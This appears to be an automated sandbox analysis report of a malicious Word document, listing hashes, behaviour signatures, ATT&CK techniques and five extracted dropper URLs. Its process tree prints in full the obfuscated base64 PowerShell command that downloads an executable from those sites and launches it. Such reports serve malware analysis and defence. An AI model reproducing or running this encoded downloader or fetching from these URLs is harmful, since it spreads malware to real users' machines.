d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee

General

Target

sample.doc
Size

173KB
MD5

ea50158bcef30d51e298846c056649c3
SHA1

6cf0cf4e216bf318b36017dfd168f561bd5f77a4
SHA256

d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee
SHA512

6fcdf8eed83306da77b6b3ac5f40d10d619b02ffb5a4f0cdcd905eaa9cc003028e23a40f456c7ef37b64aed1a59efab296032143ff7de12bb57f2b5413b40fb0
SSDEEP

3072:t54PrXcuQuvpzm4bkiaMQgAlS9gMFpmT6Cm1PwnbrQ6aQRB:8DRv1m4bnQgIS9g0pPonbrQ4RB

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/

exe.dropper

https://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/

exe.dropper

http://digiwebmarketing.com/wp-admin/72t0jjhmv7takwvisfnz_eejvf_h6v2ix/

exe.dropper

http://holfve.se/images/1ckw5mj49w_2k11px_d/

exe.dropper

http://www.cfm.nl/_backup/yfhrmh6u0heidnwruwha2t4mjz6p_yxhyu390i6_q93hkh3ddm/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	448	3024	powersheLL.exe	84

Blocklisted process makes network request 5 IoCs

flow	pid	Process
30	448	powersheLL.exe
32	448	powersheLL.exe
34	448	powersheLL.exe
36	448	powersheLL.exe
38	448	powersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1900	WINWORD.EXE
1900	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
448	powersheLL.exe
448	powersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	448	powersheLL.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1900	WINWORD.EXE
1900	WINWORD.EXE
1900	WINWORD.EXE
1900	WINWORD.EXE
1900	WINWORD.EXE
1900	WINWORD.EXE
1900	WINWORD.EXE
1900	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1900

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABsAGkAZQBjAGgAcgBvAHUAaAB3AHUAdwA9ACcAdgB1AGEAYwBkAG8AdQB2AGMAaQBvAHgAaABhAG8AbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAHUAUgBpAFQAeQBgAFAAUgBPAGAAVABvAEMAYABvAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABkAGUAaQBjAGgAYgBlAHUAZAByAGUAaQByACAAPQAgACcAMwAzADcAJwA7ACQAcQB1AG8AYQBkAGcAbwBpAGoAdgBlAHUAbQA9ACcAZAB1AHUAdgBtAG8AZQB6AGgAYQBpAHQAZwBvAGgAJwA7ACQAdABvAGUAaABmAGUAdABoAHgAbwBoAGIAYQBlAHkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGQAZQBpAGMAaABiAGUAdQBkAHIAZQBpAHIAKwAnAC4AZQB4AGUAJwA7ACQAcwBpAGUAbgB0AGUAZQBkAD0AJwBxAHUAYQBpAG4AcQB1AGEAYwBoAGwAbwBhAHoAJwA7ACQAcgBlAHUAcwB0AGgAbwBhAHMAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBlAEIAYwBsAEkAZQBuAFQAOwAkAGoAYQBjAGwAZQBlAHcAeQBpAHEAdQA9ACcAaAB0AHQAcABzADoALwAvAGgAYQBvAHEAdQBuAGsAbwBuAGcALgBjAG8AbQAvAGIAbgAvAHMAOQB3ADQAdABnAGMAagBsAF8AZgA2ADYANgA5AHUAZwB1AF8AdwA0AGIAagAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AdABlAGMAaAB0AHIAYQB2AGUAbAAuAGUAdgBlAG4AdABzAC8AaQBuAGYAbwByAG0AYQB0AGkAbwBuAGwALwA4AGwAcwBqAGgAcgBsADYAbgBuAGsAdwBnAHkAegBzAHUAZAB6AGEAbQBfAGgAMwB3AG4AZwBfAGEANgB2ADUALwAqAGgAdAB0AHAAOgAvAC8AZABpAGcAaQB3AGUAYgBtAGEAcgBrAGUAdABpAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANwAyAHQAMABqAGoAaABtAHYANwB0AGEAawB3AHYAaQBzAGYAbgB6AF8AZQBlAGoAdgBmAF8AaAA2AHYAMgBpAHgALwAqAGgAdAB0AHAAOgAvAC8AaABvAGwAZgB2AGUALgBzAGUALwBpAG0AYQBnAGUAcwAvADEAYwBrAHcANQBtAGoANAA5AHcAXwAyAGsAMQAxAHAAeABfAGQALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBjAGYAbQAuAG4AbAAvAF8AYgBhAGMAawB1AHAALwB5AGYAaAByAG0AaAA2AHUAMABoAGUAaQBkAG4AdwByAHUAdwBoAGEAMgB0ADQAbQBqAHoANgBwAF8AeQB4AGgAeQB1ADMAOQAwAGkANgBfAHEAOQAzAGgAawBoADMAZABkAG0ALwAnAC4AIgBzAGAAUABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAHMAZQBjAGMAaQBlAHIAZABlAGUAdABoAD0AJwBkAHUAdQB6AHkAZQBhAHcAcAB1AGEAcQB1ACcAOwBmAG8AcgBlAGEAYwBoACgAJABnAGUAZQByAHMAaQBlAGIAIABpAG4AIAAkAGoAYQBjAGwAZQBlAHcAeQBpAHEAdQApAHsAdAByAHkAewAkAHIAZQB1AHMAdABoAG8AYQBzAC4AIgBkAE8AVwBOAGAAbABvAEEAYABkAGYAaQBgAEwAZQAiACgAJABnAGUAZQByAHMAaQBlAGIALAAgACQAdABvAGUAaABmAGUAdABoAHgAbwBoAGIAYQBlAHkAKQA7ACQAYgB1AGgAeABlAHUAaAA9ACcAZABvAGUAeQBkAGUAaQBkAHEAdQBhAGkAagBsAGUAdQBjACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQAdABvAGUAaABmAGUAdABoAHgAbwBoAGIAYQBlAHkAKQAuACIAbABgAGUATgBHAFQASAAiACAALQBnAGUAIAAyADQANwA1ADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAYABSAGUAYQBUAGUAIgAoACQAdABvAGUAaABmAGUAdABoAHgAbwBoAGIAYQBlAHkAKQA7ACQAcQB1AG8AbwBkAHQAZQBlAGgAPQAnAGoAaQBhAGYAcgB1AHUAegBsAGEAbwBsAHQAaABvAGkAYwAnADsAYgByAGUAYQBrADsAJABjAGgAaQBnAGMAaABpAGUAbgB0AGUAaQBxAHUAPQAnAHkAbwBvAHcAdgBlAGkAaABuAGkAZQBqACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHQAbwBpAHoAbAB1AHUAbABmAGkAZQByAD0AJwBmAG8AcQB1AGwAZQB2AGMAYQBvAGoAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\337.exe

Filesize
3B

MD5
8a80554c91d9fca8acb82f023de02f11

SHA1
5f36b2ea290645ee34d943220a14b54ee5ea5be5

SHA256
ca3d163bab055381827226140568f3bef7eaac187cebd76878e0b63e9e442356

SHA512
ca4b6defb8adcc010050bc8b1bb8f8092c4928b8a0fba32146abcfb256e4d91672f88ca2cdf6210e754e5b8ac5e23fb023806ccd749ac8b701f79a691f03c87a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1jgxddpo.red.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
16B

MD5
d29962abc88624befc0135579ae485ec

SHA1
e40a6458296ec6a2427bcb280572d023a9862b31

SHA256
a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

SHA512
4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

Download Submit
memory/448-45-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/448-63-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/448-51-0x000002E0FF6C0000-0x000002E0FF6E2000-memory.dmp

Filesize
136KB

Download
memory/1900-13-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-7-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-8-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-1-0x00007FFC10C6D000-0x00007FFC10C6E000-memory.dmp

Filesize
4KB

Download
memory/1900-12-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-14-0x00007FFBCEA70000-0x00007FFBCEA80000-memory.dmp

Filesize
64KB

Download
memory/1900-11-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-16-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-18-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-20-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-21-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-19-0x00007FFBCEA70000-0x00007FFBCEA80000-memory.dmp

Filesize
64KB

Download
memory/1900-17-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-15-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-10-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-9-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-28-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-29-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-6-0x00007FFBD0C50000-0x00007FFBD0C60000-memory.dmp

Filesize
64KB

Download
memory/1900-5-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-4-0x00007FFBD0C50000-0x00007FFBD0C60000-memory.dmp

Filesize
64KB

Download
memory/1900-3-0x00007FFBD0C50000-0x00007FFBD0C60000-memory.dmp

Filesize
64KB

Download
memory/1900-2-0x00007FFBD0C50000-0x00007FFBD0C60000-memory.dmp

Filesize
64KB

Download
memory/1900-0-0x00007FFBD0C50000-0x00007FFBD0C60000-memory.dmp

Filesize
64KB

Download
memory/1900-70-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-71-0x00007FFC10C6D000-0x00007FFC10C6E000-memory.dmp

Filesize
4KB

Download
memory/1900-72-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-73-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-74-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-79-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download
memory/1900-80-0x00007FFC10BD0000-0x00007FFC10DC5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads